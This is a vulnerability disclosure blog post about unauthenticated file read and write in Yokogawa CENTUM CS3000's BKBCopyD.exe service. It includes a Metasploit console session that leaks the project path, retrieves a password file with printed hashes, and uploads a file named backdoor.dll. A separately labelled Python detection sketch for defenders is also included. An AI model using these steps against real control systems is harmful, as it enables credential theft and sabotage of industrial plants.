R7-2014-10 Disclosure: Yokogawa CENTUM CS3000 BKBCopyD.exe File System Access

Blog Post created by todb Employee on Aug 9, 2014

This blog post represents the final disclosure of the Yokogawa CENTUM CS3000 vulnerability discussed by Tod Beardsley (@todb) and Jim Denaro (@cipherlaw) in their DEFCON talk, "How To Disclose an Exploit Without Getting in Trouble". A link to that talk, and the slides, will be available shortly.


Let's start with a quote from the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerability Summary

The Yokogawa CENTUM CS3000 solution uses several services to provide its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. The service performs no authentication, which makes it possible for anyone who can reach the port to abuse several of its operations in order to:

  • Leak the CENTUM project database location.
  • Read arbitrary files.
  • Write arbitrary files.

Reading and writing to the file system will happen with the privileges of the CENTUM user.

Disclosure Timeline

Date             Description
March, 2014      Client-Attorney Relationship Established between Cipherlaw Group and Rapid7
April 14, 2014   Vulnerability details disclosed to attorney
May 1, 2014      Details offered to vendor
June 25, 2014    Details disclosed to CERTs
Aug 9, 2014      Details, Metasploit module published as PR 3637

Technical Analysis

The “BKBCopyD.exe” service provides several operations, which can be abused without further authentication by anyone with network access to the service. The operations are described below:

  • PMODE: this command returns the values of environment variables. These include the MR_DBPATH variable, which holds the project path on the local file system or on a network resource.
  • RETR: this command reads arbitrary files from the remote file system with the privileges of the CENTUM user. Neither the service nor the command provides any additional authentication or authorization mechanism.
  • STOR: this command stores arbitrary files on the remote file system with the privileges of the CENTUM user. Neither the service nor the command provides any additional authentication or authorization mechanism.
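From the defender's side, the three operations above can be told apart on the wire by the FTP-style status line the service returns (the PMODE reply "210 PMODE <path> command successful" is shown later in this post). The following Python sketch is an added example, not part of this post or of the Metasploit module: it classifies BKBCopyD sessions on TCP/20111 by operation and by whether the client is a known engineering station. The allowlist, the sample sessions, and the assumption that RETR and STOR replies name their operation after the status code the same way PMODE does are all constructed for this example.

```python
import re
from dataclasses import dataclass

BKBCOPYD_PORT = 20111  # default listener of BKBCopyD.exe (from the advisory)

# Hosts expected to use the FCS / Test Function. Constructed for this example;
# a real deployment would load its own inventory of engineering stations.
ENGINEERING_STATIONS = {"172.17.1.10"}

# The advisory shows the reply "210 PMODE <path> command successful". Assumption:
# RETR and STOR replies name their operation the same way after the status code.
STATUS_RE = re.compile(r"^(?P<code>\d{3}) (?P<op>PMODE|RETR|STOR)\b")

# Severity follows the impact order in the advisory: path leak < file read < file write.
SEVERITY = {"PMODE": "medium", "RETR": "high", "STOR": "critical"}


@dataclass
class Session:
    src: str            # client address
    dst_port: int       # server port
    server_reply: str   # first status line returned by the service


def assess(session):
    """Return (severity, reason) for a session worth alerting on, else None."""
    if session.dst_port != BKBCOPYD_PORT:
        return None
    m = STATUS_RE.match(session.server_reply.strip())
    op = m.group("op") if m else "unknown"
    if session.src in ENGINEERING_STATIONS:
        # Routine engineering use; still record file writes, since STOR needs no auth.
        if op == "STOR":
            return ("info", f"file write (STOR) from engineering station {session.src}")
        return None
    return (SEVERITY.get(op, "low"),
            f"unauthenticated {op} to BKBCopyD from non-engineering host {session.src}")


# Constructed sample sessions, not captured traffic.
SAMPLES = [
    Session("172.17.1.10", 20111, "210 PMODE C:\\CS3000\\ENG\\BKPROJECT\\MYPJT command successful"),
    Session("10.9.8.7", 20111, "210 PMODE C:\\CS3000\\ENG\\BKPROJECT\\MYPJT command successful"),
    Session("10.9.8.7", 20111, "210 RETR command successful"),
    Session("10.9.8.7", 20111, "210 STOR command successful"),
    Session("10.9.8.7", 445, "SMB negotiate"),
]


def alerts(sessions=SAMPLES):
    """Run assess() over a batch and keep only the sessions that produced an alert."""
    return [a for a in map(assess, sessions) if a is not None]
```

Because the service itself offers no authentication, the allowlist check is doing the work here; the same source-address restriction belongs on the host firewall in front of TCP/20111.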

Exploitation

A working Metasploit module has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where it is possible to leak the database location and to retrieve and store arbitrary files:

  • Retrieving the database location with PMODE:

msf > use auxiliary/admin/scada/yokogawa_bkbcopyd_client
msf auxiliary(yokogawa_bkbcopyd_client) > set RHOST 172.17.1.63
RHOST => 172.17.1.63
msf auxiliary(yokogawa_bkbcopyd_client) > set action PMODE
action => PMODE
msf auxiliary(yokogawa_bkbcopyd_client) > run

[*] 172.17.1.63: 20111 - Sending PMODE packet...
[+] Success: 210 PMODE C:\CS3000\ENG\BKPROJECT\MYPJT\TestMaster\HIS0163\database command successful

  • Retrieving the project password database with RETR:

msf auxiliary(yokogawa_bkbcopyd_client) > set action RETR
action => RETR
msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
msf auxiliary(yokogawa_bkbcopyd_client) > run

[*] 172.17.1.63: 20111 - Sending RETR packet...
[*] Server started.
[*] 172.17.1.63 - Getting data...
[+] /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin saved!
[*] 172.17.1.63 - Getting data...
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_bkbcopyd_client) > cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin
[*] exec: cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin

#YDCS_PASSWORD PROJECT: MYPJT
OFFUSER:01a742f640f8a4c0b57feb7ae6e29099:1391182083
ONUSER:aad21bd26dae81dce52741595bea7beb:1391182083
ENGUSER:2550cc2337fcd119327b8d730476cfdc:1391182083
PROG:b08f11a7e028f607009ba4039d9bda0e:1391182083
TESTUSER:2dc22e16cbfae90fafd1a5d84e09b48f:1391182083
#!2712db741f4af7718f74fd179deacbe3msf

  • Placing remote files with STOR:

msf auxiliary(yokogawa_bkbcopyd_client) > set action STOR
action => STOR
msf auxiliary(yokogawa_bkbcopyd_client) > set LPATH /tmp/backdoor.dll
LPATH => /tmp/backdoor.dll
msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
msf auxiliary(yokogawa_bkbcopyd_client) > run

[*] 172.17.1.63: 20111 - Sending STOR packet...
[*] Server started.
[*] 172.17.1.63 - Sending data...
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_bkbcopyd_client) >

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Outcomes